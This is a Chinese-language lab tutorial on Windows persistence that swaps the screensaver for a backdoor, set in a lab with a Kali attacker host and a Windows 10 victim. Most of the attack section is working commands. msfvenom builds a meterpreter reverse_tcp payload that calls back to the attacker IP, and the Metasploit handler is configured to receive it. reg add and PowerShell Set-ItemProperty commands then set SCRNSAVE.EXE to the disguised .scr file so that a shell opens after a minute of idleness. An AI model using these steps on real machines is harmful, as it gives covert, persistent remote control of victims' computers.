环境说明
| IP | HOSTNAME | NOTE |
|---|---|---|
| 172.16.106.67 | kali_dqy | 攻击者主机 |
| 10.10.10.88 | win10_dqy | 受害者主机 |
前言
-
屏幕保护程序是Windows自带的系统功能,用户在一段时间不活动后自动放置屏幕动画。但是由于屏幕保护程序是具有.src文件扩展名的可执行文件,所以其常常被攻击者作为持久化的方式之一。
-
屏幕保护程序设置存储在如下注册表中:
HKCU\Control Panel\Desktop

- 默认Win10没有设置屏幕保护程序,可通过控制面板中搜索屏幕保护程序,来设置屏幕保护程序,设置成功后,注册表中将增加相应的键值。

攻击过程
配置MSF
- 生成后门程序
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.106.67 LPORT=2335 -f exe > attack_demo.exe
- 配置MSF监听端口
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.106.67
set lport 2335
exploit

替换屏幕保护程序为后门程序
- 将生成的后门程序attack_demo.exe后缀替换为scr。
- 然后进行替换注册表键值,cmd可以采用reg add命令进行键值替换
reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d E:\payload\attack_demo.scr

- powershell采用Set-ItemProperty命令进行替换
Set-ItemProperty -Path 'HKCU:\Control Panel\Desktop\' -Name 'SCRNSAVE.EXE' -Value 'E:\payload\attack_demo.scr'
执行结果
- 等待60秒后,触发后门程序,上线MSF

参考链接
1.https://paper.seebug.org/1007/
2.https://www.its500.com/article?url=xiaozi/p/11833495.html